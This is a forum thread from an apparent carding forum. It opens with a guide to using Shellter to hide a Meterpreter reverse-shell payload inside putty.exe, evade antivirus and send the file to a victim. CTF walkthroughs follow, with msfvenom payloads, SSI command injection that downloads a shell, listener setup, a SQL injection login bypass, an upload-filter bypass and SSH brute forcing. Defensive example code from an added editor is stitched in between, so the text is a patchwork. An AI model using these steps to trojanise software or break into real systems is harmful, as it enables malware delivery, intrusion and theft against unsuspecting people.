[Guide] How to Shellter-A Shellcode Injecting Tool - Printable Version
Blackhat Carding Forum (https://bhcforums.cc), Forum: Carders Home, Thread: https://bhcforums.cc/Thread-Guide-How-to-Shellter-A-Shellcode-Injecting-Tool
[Guide] How to Shellter-A Shellcode Injecting Tool - NINZA - 05-14-2020

Hey Folks! Welcome back to learning more of what you love to do: evading the security controls of another computer or network. There are various tools to assist you in this, and one of them is Shellter.

Shellter is a dynamic shellcode injection tool. It takes a legitimate Windows executable and a payload (here, shellcode), injects the payload into the executable and re-encodes it so that the result is not recognised by anti-virus (AV) signatures. Shellter was the first truly dynamic infector for the 32-bit Windows PE (Portable Executable) format: instead of appending a new section, it traces the target program's execution flow and places the payload inside existing code, so the infected file keeps its original structure. To use Shellter you can either write your own shellcode or generate one with a framework such as Metasploit. The result is a 32-bit Windows application that carries the shellcode and, at the time of writing, went undetected by AV software. Detection rates change as vendors update signatures, so always re-test the output against the AV product you expect to face.

Let's now go through the steps to evade AV software using Shellter on Kali Linux.

Download and Install Shellter
Download Shellter from [To see content please register here]. Shellter is a Windows program; on Kali Linux you run it under Wine, which runs Windows applications on Linux-like operating systems, so no separate Windows machine is needed. You can install Shellter directly on Kali with the following command:
    apt-get install shellter
Shellter is a 32-bit binary, so install 32-bit Wine with the following command:
    apt-get install wine32

Open Shellter
When you open Shellter on Kali under Wine, it prompts you to choose an operation mode.

Choose Operation Mode
Select mode 'a', which stands for Auto. Next, choose an executable file and copy it to the Shellter folder; this is the legitimate program that Shellter will bind to the shellcode. In our case we used putty.exe. When asked for the PE Target, type the path to that executable:
    /root/Downloads/putty.exe
The binding process starts.
Press the Enter key to continue. You will see that the DisASM.dll file has been created successfully.

Enable Stealth Mode
You are then prompted to enable stealth mode. Type 'y' for yes. Stealth mode keeps the original program's functionality, so the injected putty.exe still runs PuTTY as normal once the payload has executed, which is what stops the victim from getting suspicious.

Select Payload
The screen shows a list of payloads and asks whether you want to use a listed payload or a custom one. Type 'L' to use a listed payload. It then asks you to select a payload by index; pick the payload of your choice. In our case we selected 1 for Meterpreter_Reverse_TCP.

Then you are asked to set LHOST and LPORT: the attacker's IP and the local port on which you want the session. In our case we set LHOST to 192.168.1.109 (the attacker IP) and LPORT to 4444. When you press Enter, the payload information is displayed, followed by a warning message. As soon as the injection is verified, you are asked to press Enter to continue.

Run Exploit
In a new terminal, type msfconsole to launch the Metasploit Framework and execute the following commands. LHOST and LPORT must match the values you gave Shellter, and the handler must be listening before the victim runs the file:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost <IP>
    set lport <port-no.>
    exploit

Send putty.exe to the Victim's Machine
The injected putty.exe looks and behaves like the original putty.exe, so the victim is trapped: as soon as the victim runs it, the payload connects back and we get a Meterpreter session on the handler. With the Meterpreter session open you are ready to peek into the target system.

Hello friends! Today we are going to take another CTF challenge, known as 'H.A.S.T.E.'. Credit for making this VM goes to "f1re_w1re", and it is a unique challenge in that we only have to get a reverse shell to complete it.
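Before the CTF walkthroughs, one added example for the Shellter section above (editor's code, not part of the original post and not Shellter's own code). It shows what an in-place injection of the kind Shellter performs looks like from the defender's side: the infected putty.exe keeps the same section layout, but the entry point and the bytes inside an existing code section change. The script parses the PE32 headers with only the standard library and reports those differences between a trusted copy and a suspect copy. The images it compares are constructed in memory (build_sample_pe produces a stub PE with .text and .data sections, not a real program), and the patched bytes and new entry point are made up; where exactly Shellter places its code is not described on this page.

```python
"""Added example (editor's code, not from the original post or from Shellter):
section-level comparison of a trusted PE32 image against a suspect copy."""
import hashlib
import struct


def parse_pe(data: bytes) -> dict:
    """Parse just enough of a PE32 file to get the entry point and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here, which is all Shellter targets")
    entry = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = {}
    table = opt + opt_size
    for i in range(nsections):
        # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        name, _, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + i * 40)
        body = data[raw_ptr:raw_ptr + raw_size]
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = {
            "va": va, "size": raw_size, "sha256": hashlib.sha256(body).hexdigest()}
    return {"entry": entry, "sections": sections}


def diff_pe(trusted: bytes, suspect: bytes) -> list:
    """Return a list of findings; an empty list means the two images match section for section."""
    a, b = parse_pe(trusted), parse_pe(suspect)
    findings = []
    if a["entry"] != b["entry"]:
        findings.append("entry point moved 0x%x -> 0x%x" % (a["entry"], b["entry"]))
    for name in sorted(b["sections"].keys() - a["sections"].keys()):
        findings.append("new section %r (a classic appending injector; Shellter does not do this)" % name)
    for name in sorted(a["sections"].keys() - b["sections"].keys()):
        findings.append("section %r removed" % name)
    for name in sorted(a["sections"].keys() & b["sections"].keys()):
        if a["sections"][name]["sha256"] != b["sections"][name]["sha256"]:
            findings.append("section %r contents changed in place" % name)
    return findings


def build_sample_pe(text: bytes, entry: int = 0x1000) -> bytes:
    """Constructed stand-in for putty.exe: a minimal PE32 with .text and .data (not runnable)."""
    data = b"hello putty\0".ljust(0x200, b"\0")
    sections = [(b".text", 0x1000, text), (b".data", 0x2000, data)]
    headers_size, opt_size = 0x400, 224          # 224 = PE32 optional header with 16 data directories
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew at offset 0x3C -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    # Magic, linker major/minor, SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData, AddressOfEntryPoint
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, len(text), len(data), 0, entry).ljust(opt_size, b"\0")
    table, bodies, raw_ptr = b"", b"", headers_size
    for name, va, body in sections:
        table += struct.pack("<8sIIII", name, len(body), va, len(body), raw_ptr) + b"\0" * 16
        bodies += body
        raw_ptr += len(body)
    return (dos + coff + opt + table).ljust(headers_size, b"\0") + bodies


def demo() -> list:
    """Simulate an in-place infection: same sections, patched code bytes, entry point moved into the patch."""
    code = bytes(range(256)) * 2                                      # 0x200 bytes of stand-in code
    original = build_sample_pe(code, entry=0x1000)
    patched = code[:0x100] + b"\xe8\x00\x00\x00\x00" + code[0x105:]  # made-up 5-byte call stub
    infected = build_sample_pe(patched, entry=0x1100)                 # entry now points at the stub
    return diff_pe(original, infected)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice compare the suspect file against the vendor's published hash or its Authenticode signature rather than against a local copy. The point of the comparison is that an injector which adds no section still changes the hash of a section it patches, so section-level hashing catches it even when the file size and layout look normal.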
You can download this VM from [To see content please register here]. Let's breach!

Let us start by finding the IP of the VM (here I have it at 192.168.0.102, but you will have to find your own):
    netdiscover
Use nmap for port and service enumeration:
    nmap -sV 192.168.0.102
We find that port 80 is open, so we open the IP address in our browser. We don't find anything on the page, so we use dirb to list directories on the web server:
    dirb [To see content please register here]
When we open [To see content please register here] we get a hint that the website may be vulnerable to server-side include (SSI) injection. When we open [To see content please register here] we find the code executed by the server. Now we go back to [To see content please register here] and use SSI injection to execute our commands. We executed the 'ls -la' command to check that it works, and it ran successfully. The payload is the standard SSI exec directive:
    <!--#exec cmd="ls -la" -->
Now we create a Python payload using msfvenom:
    msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.py
Now we upload our shell to the server using SSI injection, fetching shell.py with wget from a location we control:
    <!--#exec cmd="wget [To see content please register here]" -->
We set up our listener using Metasploit (do this before triggering the payload, otherwise the connection back is refused):
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload python/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.0.107
    msf exploit(handler) > set lport 4444
    msf exploit(handler) > exploit
After successfully uploading the shell, we use SSI injection to execute our payload:
    <!--#exec cmd="python shell.py" -->
As soon as we execute our payload we get a reverse shell. The main objective of the challenge was to get a reverse shell, so it is done.

Today we are going to take another CTF challenge known as RickdiculouslyEasy by Luke. It is a very simple Rick and Morty themed boot-to-root.
We have to get a total of 130 points by collecting the different flags (each flag's points are recorded with it), and we also have to get root. If anyone is new to pentesting, it is worth a try! You can download it from [To see content please register here]
Security Level: Beginner

Penetration Methodology
Scanning, Enumeration, Exploiting, Privilege Escalation
Scanning
After loading up the VM, our first step was to find out the target's IP address:
    netdiscover
We found our target's IP address to be 192.168.1.101. The next step was to scan all ports of the target with service and script detection:
    nmap -p- -A 192.168.1.101
The scan result showed the open ports. We found our first flag returned as the banner of the service running on port 13337; moreover, anonymous FTP login was allowed on port 21, and the FTP root held another FLAG.txt file.

Enumeration
From the nmap scan we knew that anonymous FTP login was available, so we logged in with the username 'anonymous' and a blank password. In the FTP console, ls showed 'FLAG.txt', and a get command downloaded FLAG.txt over FTP to the Kali box. We found our second flag inside FLAG.txt:
    ftp 192.168.1.101
    ls
    get FLAG.txt
    quit
    cat FLAG.txt
From the nmap result we also found an HTTP service running on port 80. We browsed to the target's IP, but in vain. Next we listed directories using dirb; it showed us two important entries, '/passwords/' and '/robots.txt':
    dirb [To see content please register here]
Viewing the '/passwords/' directory displayed 'FLAG.txt' and 'password.html'. We found our third flag here; so far it was a cakewalk. Browsing '/passwords/password.html' pointed to a hidden password. Why not go for the source code? The instinct was right: the page source holds the password "winter", which we can use somewhere later.

Next we opened '/robots.txt' and found links to two files, '/cgi-bin/root_shell.cgi' and '/cgi-bin/tracertool.cgi'. Only '/cgi-bin/tracertool.cgi' turned out to be useful; browsing it, I found that one could get away with command injection, or in other words RCE.
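As an added example tied to the tracertool.cgi finding above and to the SSI exec directive used in the H.A.S.T.E. walkthrough (editor's code, not the CTF's CGI script, which is not shown on this page): the vulnerable pattern is a CGI handler that pastes the user-supplied host into a shell command line. A printf stands in for traceroute so the script runs anywhere, and the blacklist of forbidden words is made up, but it shows why that kind of filter fails: a command the author did not list (the walkthrough's 'more' instead of 'cat') or a backslash inside a listed word goes straight past it. The hardened version allow-lists the host and passes it as a single argv element with no shell involved.

```python
"""Added example (editor's code, not the CTF's tracertool.cgi): a command-injection
bug of the kind behind tracertool.cgi and SSI <!--#exec cmd=...-->, next to its fix."""
import re
import subprocess

# Constructed blacklist of the sort a 'filtered' CGI uses. A denylist can only cover
# what its author thought of, and it also mangles legitimate hostnames that contain a
# forbidden substring (the 'nc' in 'francisco.example.com', for instance).
BLACKLIST = ("cat", "echo", "nc")


def filtered(user_input: str) -> str:
    """Strip forbidden words and carry on: the 'hardening' the walkthrough bypasses with 'more'."""
    for bad in BLACKLIST:
        user_input = user_input.replace(bad, "")
    return user_input


def vulnerable_trace(host: str) -> str:
    """Builds the command line by string concatenation and hands it to /bin/sh (the bug).

    printf stands in for `traceroute` so this runs offline; shell metacharacters in
    `host` (; | && $(...) and backticks) are interpreted exactly as they would be for traceroute.
    """
    cmd = "printf 'tracing %s\\n' " + filtered(host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allow-list: letters, digits, dots and dashes, and the first character may not be '-',
# so the value cannot be turned into an option (argument injection) either.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def safe_trace(host: str) -> str:
    """Validate the input, then pass it as one argv element; no shell ever sees it.

    Even if a metacharacter slipped through the regex it would reach the program as a
    literal argument, not as shell syntax.  For the real tool: ["traceroute", host].
    """
    if not HOST_RE.fullmatch(host):
        raise ValueError("refusing to trace %r: not a hostname or IP" % host)
    done = subprocess.run(["printf", "tracing %s\\n", host],
                          capture_output=True, text=True, check=True)
    return done.stdout


if __name__ == "__main__":
    for payload in ("8.8.8.8",
                    "8.8.8.8; cat /etc/passwd",   # 'cat' is stripped, so the filter appears to work
                    "8.8.8.8; printf INJECTED",   # a command the author forgot to list
                    "8.8.8.8; e\\cho BYPASS"):    # e\cho is not 'echo' to the filter, but is to sh
        print(repr(payload), "->", repr(vulnerable_trace(payload)))
    print(repr(safe_trace("8.8.8.8")))
    try:
        safe_trace("8.8.8.8; printf INJECTED")
    except ValueError as err:
        print(err)
```

The same lesson applies to the SSI exec directive: whatever follows cmd= is run by a shell, so the only real fix on the server is not to allow exec at all (on Apache, Options IncludesNOEXEC) rather than to filter the words inside it.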
I also found that a few commands have been filtered, so we had to use 'more' instead of 'cat' to get the names of the users from the /etc/passwd file. Here I found three users: RickSanchez, Morty and Summer. Summer could be linked to the 'winter' that we found earlier.

Exploiting
It was time to perform an SSH login using Metasploit on port 22222 with the newly acquired credentials (sessions -u upgrades the shell session to Meterpreter). And we found one more flag here:
    use auxiliary/scanner/ssh/ssh_login
    set rhosts 192.168.1.101
    set rport 22222
    set username Summer
    set password winter
    exploit
    sessions -u 1
    sessions 2
    ls
    cat FLAG.txt
Further enumeration showed three directories under /home with the same names as the users we found earlier. From the Morty directory we downloaded two files, 'Safe_Password.jpg' and 'journal.txt.zip', through the Meterpreter session:
    cd /home
    ls
    cd Morty
    ls
    download Safe_Password.jpg .
    download journal.txt.zip .
Safe_Password.jpg is an image file, but running strings on it shows that a password, "Meeseek", is embedded inside it:
    strings Safe_Password.jpg
Unzipping the archive and supplying the password 'Meeseek' opens the file journal.txt, and the next flag is inside it:
    unzip journal.txt.zip
    cat journal.txt
Along with the flag there was a number string, '131333', and the message in the file hints that it is some kind of password.

Back on the target VM, inside the 'RickSanchez' directory there is a subdirectory named "RICK_SAFE", which was mentioned in the journal. Inside it there is an executable file named "safe". I downloaded this file to the main Kali machine:
    cd RickSanchez
    ls
    cd RICK_SAFE
    ls
    download safe .
After providing all permissions to the file 'safe' and executing it with the string given with the previous flag, it displayed our fifth flag. Inside it there are clues to Rick's password too:
    chmod 777 safe
    ./safe
    ./safe 131333
The next password contains 1 uppercase character and 1 digit, followed by one of the words in the name of Rick Sanchez's old band. So I had to do some web surfing to find out the band's name; it was called 'The Flesh Curtains'. Next, we used crunch to generate wordlists for both formats (in a crunch -t pattern, ',' stands for an uppercase letter and '%' for a digit, which is why the lengths are 10 and 7) and appended both to dict.txt:
    crunch 10 10 -t ,%Curtains >> dict.txt
    crunch 7 7 -t ,%Flesh >> dict.txt
It was time to use Hydra, which tried to log in to the SSH service on port 22222 as RickSanchez with every password in dict.txt:
    hydra -l RickSanchez -P dict.txt 192.168.1.101 ssh -s 22222
Great! We found a user/password pair.

Privilege Escalation
Then I logged in over SSH using the recently acquired credentials. I reminded myself of the message in the last flag, "sudo is wheely good", so I ran sudo -l to find out his permissions. He had sudo permission for ALL commands, so I just popped into an interactive root shell. In the root directory we had our next flag inside FLAG.txt, but in order to read the flag we had to use 'more' instead of 'cat':
    ssh RickSanchez@192.168.1.101 -p 22222
    sudo -l
    sudo su
    cd /root
    ls
    cat FLAG.txt
    more FLAG.txt
Now I was root and I had 110 points out of 130. Where did I miss 20 points? We still hadn't checked a few of the open ports. We connected to port 60000 using netcat, and it dropped us into a shell.
ls showed us FLAG.txt and cat displayed the flag:
    nc 192.168.1.101 60000
    ls
    cat FLAG.txt
We opened port 9090 in a web browser and found the last flag. Hence the task is completed.

BTRSys v1 is another lab by 'ismailonderkaya' in the BTRSys series. This lab helps you sharpen your skills as a pentester, and it is a must-do lab for a beginner.
Difficulty level: Beginner

WalkThrough
Let's start by finding our target, as always, with the following command:
    netdiscover
Now we know our target is 192.168.0.105. Let's use nmap on it. Nmap has many types of scans, but the aggressive scan (-A) is convenient here as it combines OS detection, version detection, script scanning and traceroute and gives all the information at once:
    nmap -A 192.168.0.105
Through nmap we know that ports 21, 22 and 80 are open, with the services FTP, SSH and HTTP respectively. As nmap hasn't told us much more, we dig deeper using Nikto. Nikto is an open-source web server scanner that looks for vulnerable files/programs, outdated versions, index files, HTTP server options, etc. To use Nikto type:
    nikto -h [To see content please register here]
With the help of Nikto we know that there is a login page at /login.php. Let's go to the login page by typing the following in the URL bar:
    192.168.0.105/login.php
So now we are on the login page, but we do not have credentials to log in. Let's check its page source. In the page source, if you observe the control function carefully, you'll realise that it only requires the username to end with @btrisk.com; that check runs in the browser, so the server may still pass whatever we send straight into its SQL query, and we can try SQL injection here. To do so, use Burp Suite's Intruder to brute-force the login form with a list of SQL injection strings.
(When asked for the text file for the brute force, select the one with the list of all SQL injection strings.) After the brute force completes, it shows which SQL string logs you in successfully. Right-click on that request and select 'Show response in browser'. This opens the browser and you will find yourself logged in automatically.
Login details: @btrisk.com with the injection string ' or ''='

As we are logged in, there is an option to upload a file. Here we can upload our malicious PHP code. To generate the code, go to the Kali terminal and type:
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw
Copy the code from <?php to die(); and save it in a .txt file. After saving, change the extension from .txt to .php and then upload it. When you try to upload your .php file it will tell you that only jpg and png files can be uploaded. Okay! So change the extension from .php to .jpg and upload it again, but this time capture the request in Burp Suite. Once the request is captured in Burp Suite, change the file extension in the request from .jpg back to .php and forward the request. The extension check never ran on the server, so your malicious .php file is stored on the web application as shell.php.

Our malicious file is uploaded, but we have yet to find the directory where it was stored so that we can execute it and get our session. Therefore, next we will use dirb:
    dirb [To see content please register here]
Dirb has shown us that there is a directory named uploads, so obviously that is where our file went. To execute the file, type the following in the URL bar:
    192.168.0.105/uploads/shell.php
As always, before executing the file remember to activate your handler in Metasploit so that you can catch your session.
And for this, open Metasploit and type:
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.0.107
    set lport 4444
    exploit
After the handler is activated and your file is executed, you will have your Meterpreter session. Let's check the system information:
    sysinfo
Now that we have a Meterpreter session, let's explore a bit and look at the web root:
    cd /var/www/html
    ls
There is a config.php file in /var/www/html. This file has often proven to be important, so let's check it out:
    cat config.php
config.php contains the database connection settings: the user root, the password toor and the database deneme. Let's drop to a shell and log in to MySQL with these:
    shell
    mysql -uroot -p -Ddeneme
and then enter the password toor. Once logged in, let's list the tables with the following command:
    show tables;
There is a table named user. Let's see what this table holds:
    select * from user;
The table stores the credentials in clear text, and from it we now know that the password for root is asd123***. Let's switch to root with it:
    su root
    asd123***
Let's confirm our root access:
    whoami
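One added example for the BTRSys login bypass above (editor's code, not the lab's login.php, which is not reproduced on this page). It rebuilds the bug on an in-memory SQLite table with constructed rows: the client-side check only requires the username to end in @btrisk.com, and the server concatenates both fields into its query, so the injection string ' or ''=' turns the WHERE clause into one that is always true and logs you in as the first user in the table. The parameterised version beside it sends the same string as data and gets no row. The table and column names are assumptions.

```python
"""Added example (editor's code, not the BTRSys lab's login.php): the SQL injection
login bypass from the walkthrough, rebuilt on SQLite, next to the parameterised fix."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory user table with constructed rows; the real lab's schema is not on this page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("admin@btrisk.com", "s3cret"), ("user@btrisk.com", "hunter2")])
    return conn


def client_side_check(username: str) -> bool:
    """What the page's JavaScript 'control' function enforces: the browser, not the server, insists on the domain."""
    return username.endswith("@btrisk.com")


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Concatenates user input into the statement, so whatever the user typed becomes SQL syntax.

    With password = "' or ''='" the query ends in
        AND password = '' or ''=''
    and AND binds tighter than OR, so every row satisfies the WHERE clause.
    """
    query = ("SELECT username FROM user WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Placeholders send the values separately from the statement; a quote in them is just a quote."""
    row = conn.execute("SELECT username FROM user WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Replay the walkthrough's credentials against both versions."""
    conn = make_db()
    username, injection = "@btrisk.com", "' or ''='"
    return {
        "client_check_passes": client_side_check(username),
        "vulnerable": vulnerable_login(conn, username, injection),   # logs in as the first row
        "safe": safe_login(conn, username, injection),               # no such user/password
        "legit": safe_login(conn, "user@btrisk.com", "hunter2"),     # the fix still lets real logins through
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Parameterisation is the whole fix for the injection; the lab's other mistake, keeping passwords in clear text in the user table (which is what let su root succeed later), is a separate one and calls for storing salted password hashes instead.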